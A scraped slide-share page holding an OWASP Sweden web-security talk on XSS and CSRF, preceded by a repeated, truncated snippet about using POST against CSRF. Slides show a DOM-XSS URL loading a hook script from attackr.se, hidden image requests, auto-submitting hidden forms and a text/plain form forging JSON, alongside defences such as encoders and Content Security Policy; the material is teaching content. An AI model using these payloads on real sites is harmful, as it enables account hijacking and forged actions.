Here are a few key points about restricting to HTTP POST to help prevent CSRF attacks:- GET requests can be easily forged by including links or embedding resources like images, scripts, etc. POST requests require actually submitting a form, which is harder for an attacker to force a user's browser to do silently.- Many frameworks and applications only allow state-changing actions (login, money transfer, etc) via POST to prevent accidental CSRF. GET should only be used for safe/idempotent operations like viewing data.- Using POST makes it harder for an attacker to construct a silent CSRF request, as they can't just link to it - they need to craft an entire hidden form submission. This increases the
I Don't Care About Security (And Neither Should You)
Similar a Here are a few key points about restricting to HTTP POST to help prevent CSRF attacks:- GET requests can be easily forged by including links or embedding resources like images, scripts, etc. POST requests require actually submitting a form, which is harder for an attacker to force a user's browser to do silently.- Many frameworks and applications only allow state-changing actions (login, money transfer, etc) via POST to prevent accidental CSRF. GET should only be used for safe/idempotent operations like viewing data.- Using POST makes it harder for an attacker to construct a silent CSRF request, as they can't just link to it - they need to craft an entire hidden form submission. This increases the
Similar a Here are a few key points about restricting to HTTP POST to help prevent CSRF attacks:- GET requests can be easily forged by including links or embedding resources like images, scripts, etc. POST requests require actually submitting a form, which is harder for an attacker to force a user's browser to do silently.- Many frameworks and applications only allow state-changing actions (login, money transfer, etc) via POST to prevent accidental CSRF. GET should only be used for safe/idempotent operations like viewing data.- Using POST makes it harder for an attacker to construct a silent CSRF request, as they can't just link to it - they need to craft an entire hidden form submission. This increases the (20)
TeamStation AI System Report LATAM IT Salaries 2024
Here are a few key points about restricting to HTTP POST to help prevent CSRF attacks:- GET requests can be easily forged by including links or embedding resources like images, scripts, etc. POST requests require actually submitting a form, which is harder for an attacker to force a user's browser to do silently.- Many frameworks and applications only allow state-changing actions (login, money transfer, etc) via POST to prevent accidental CSRF. GET should only be used for safe/idempotent operations like viewing data.- Using POST makes it harder for an attacker to construct a silent CSRF request, as they can't just link to it - they need to craft an entire hidden form submission. This increases the
2. Frontend developer at
Svenska Handelsbanken
Researcher in application security
Co-leader OWASP Sweden
@johnwilander
johnwilander.com (music)
OWASP == The Open Web
Application Security Project
Cheat sheets, tools, code, guidelines
https://owasp.org
3. ÅåÄäÖö
The above three extra letters are Swedish developers’
biggest problem. Help us – use UTF-8!
4. OWASP Top 10
Top web application
security risks 2010
5. 1. Injection
2. Cross-Site Scripting (XSS)
3. Broken Authentication and Session
Management
4. Insecure Direct Object References
5. Cross-Site Request Forgery (CSRF)
6. Security Misconfiguration
7. Insecure Cryptographic Storage
8. Failure to Restrict URL Access
9. Insufficient Transport Layer Protection
10. Unvalidated Redirects and Forwards
19. Cross-Site Scripting
Type 0, DOM-based
g
ip tin
Scr
Cros
No server roundtrip!
s-Sit
e
Also, single-page interfaces
make injected scripts ”stick”
Ph
isi
in thenDOM.
g
22. Would you click this?
https://secure.bank.com/authentication
#language=<script src="http://attackr.se:
3000/hook.js"></script>&country=SE
23. Would you click this?
https://secure.bank.com/authentication
#language=%3Cscript%20src%3D%22http%3A%2F
%2Fattackr.se%3A3000%2Fhook.js%22%3E%3C
%2Fscript%3E&country=SE
25. Filter out <script>?
var ... ,
stripScriptsRe = /(?:<script.*?>)((n|r|.)*?)(?:</script>)/ig,
/**
* Strips all script tags
* @param {Object} value The text from which to strip script tags
* @return {String} The stripped text
*/
stripScripts : function(v) {
return !v ? v : String(v).replace(stripScriptsRe, "");
},
http://docs.sencha.com/ext-js/4-0/#!/api/Ext.util.Format-method-stripScripts
36. The Patch™
var c = location.href.split("#!")[1];
if (c) {
window.location = c.replace(":", "");
} else {
return true;
}
37. The Patch™
var c = location.href.split("#!")[1];
if (c) {
window.location = c.replace(":", "");
} else {
return true;
}
Replaces the first occurance
of the search string
40. The 2nd Patch™
(function(g){
var a = location.href.split("#!")[1];
if(a) {
g.location = a.replace(/:/gi,"");
}
})(window);
41. (function(g){
var a = location.href.split("#!")[1];
if(a) {
g.location = a.replace(/:/gi,"");
}
})(window); Regexp pattern
delimiters
42. (function(g){
var a = location.href.split("#!")[1];
if(a) {
g.location = a.replace(/:/gi,"");
}
})(window); Regexp pattern
delimiters
Global match
43. (function(g){
var a = location.href.split("#!")[1];
if(a) {
g.location = a.replace(/:/gi,"");
}
})(window); Regexp pattern
delimiters
Global match Ignore case
47. The n:th Patch™
(this one works)
(function(g){
var a = location.href.split("#!")[1];
if(a) {
g.location.pathname = a;
}
})(window);
And hey, Twitter is doing the right thing: https://twitter.com/about/security
49. https://github.com/chrisisbeef/jquery-encoder
• $.encoder.canonicalize()
Throws Error for double encoding or multiple encoding
types, otherwise transforms %3CB%3E to <b>
• $.encoder.encodeForCSS()
Encodes for safe usage in style attribute and style()
• $.encoder.encodeForHTML()
Encodes for safe usage in innerHTML and html()
• $.encoder.encodeForHTMLAttribute()
Encodes for safe usage in HTML attributes
• $.encoder.encodeForJavaScript()
Encodes for safe usage in event handlers etc
• $.encoder.encodeForURL()
Encodes for safe usage in href etc
50. https://github.com/chrisisbeef/jquery-encoder
• $.encoder.canonicalize()
Throws Error for double encoding or multiple encoding
types, otherwise transforms %3CB%3E to <b>
• $.encoder.encodeForCSS()
Encodes for safe usage in style attribute and style()
• $.encoder.encodeForHTML()
Encodes for safe usage in innerHTML and html()
• $.encoder.encodeForHTMLAttribute()
Encodes for safe usage in HTML attributes
• $.encoder.encodeForJavaScript()
Encodes for safe usage in event handlers etc
• $.encoder.encodeForURL()
Encodes for safe usage in href etc
52. Also, check out ...
Content Security Policy
http://people.mozilla.com/~bsterne/
content-security-policy/
53. New HTTP Response
Header Saying ...
Only allow scripts from whitelisted domains
and
only allow scripts from files, i.e. no inline scripts
54. 'self' = same URL, protocol and port
X-Content-Security-Policy: default-src 'self'
Accept all content including scripts only from my own URL+port
X-Content-Security-Policy: default-src *;
script-src trustedscripts.foo.com
Accept media only from my URL+port (images, stylesheets,
fonts, ...) and scripts only from trustedscripts.foo.com
58. Is www.attackr.se allowed to
load images like this:
<img src=”https://secure.bank.com/
logo.png" />
?
59. Is www.attackr.se allowed to
load images like this:
<img src=”https://secure.bank.com/
authentication#language=sv&country=SE" />
?
60. With image tags www.attackr.se can silently
send HTTP GET requests to any domain
<img src=”https://secure.bank.com/
authentication#language=sv&country=SE"
height=0 width=0 />
66. What’s on your mind? What’s on your mind?
POST I hate OWASP! POST
67. What’s on your mind? What’s on your mind?
POST I hate OWASP! POST
68. What’s on your mind? What’s on your mind?
POST I hate OWASP! POST
John: I hate OWASP!
69. What’s on your mind? What’s on your mind?
POST <form id="target" method="POST"
action="https://1-liner.org/form">
John: I hate OWASP! <input type="text" value="I hate
OWASP!" name="oneLiner"/>
<input type="submit"
value="POST"/>
</form>
<script type="text/javascript">
$(document).ready(function() {
$('#form').submit();
});
</script>
70. <form id="target" method="POST"
action="https://1-liner.org/form">
<input type="text" value="I hate
OWASP!" name="oneLiner"/>
<input type="submit"
What’s on your mind? What’s on your mind?
value="POST"/>
POST
</form>
John: I hate OWASP!
<script>
$(document).ready(function() {
$('#target').submit();
});
</script>
89. <form id="target" method="POST"
action="https://vulnerable.1-liner.org:
8444/ws/oneliners"
style="visibility:hidden"
enctype="text/plain">
Forms produce a request body that
<input type="text" like this:
looks
name=””
value="" /> theName=theValue
... and that’s not valid JSON.
<input type="submit" value="Go" />
</form>
91. <form id="target" method="POST"
action="https://vulnerable.1-liner.org:
8444/ws/oneliners"
style="visibility:hidden"
Produces a request body that looks
enctype="text/plain">
like this:
<input type="text"
{"id": 0, "nickName":
name='{"id": 0, "nickName": "John",
"John","oneLiner": "I
"oneLiner": "I hate OWASP!",
hate OWASP!","timestamp":
"timestamp": "20111006"}//'
"20111006"}//=dummy
value="dummy" />
... and that is acceptable JSON!
<input type="submit" value="Go" />
</form>
93. Demo XSS + CSRF with
The Browser Exploitation Framework
http://beefproject.com/
94. Important in your
REST API
• Restrict HTTP method, e.g. POST
Easier to do CSRF with GET
• Restrict to AJAX if applicable
X-Requested-With:XMLHttpRequest
Cross-domain AJAX prohibited by default
• Restrict media type(s), e.g. application/json
HTML forms only allow URL encoded, multi-part
and text/plain
95. Attacker may spoof
headers via Flash proxy
http://lists.webappsec.org/pipermail/
websecurity_lists.webappsec.org/2011-
February/007533.html
105. How To Get It Right
• Join your local OWASP chapter
https://www.owasp.org/index.php/OWASP_Chapter
• Start following these fellas on Twitter:
@WisecWisec @0x6D6172696F @garethheyes
@internot_ @securityninja @jeremiahg
@kkotowicz @webtonull @manicode @_mwc
• Start hacking – it’s fun!
Best place to start? Your own apps of course.
Just stay legal ;)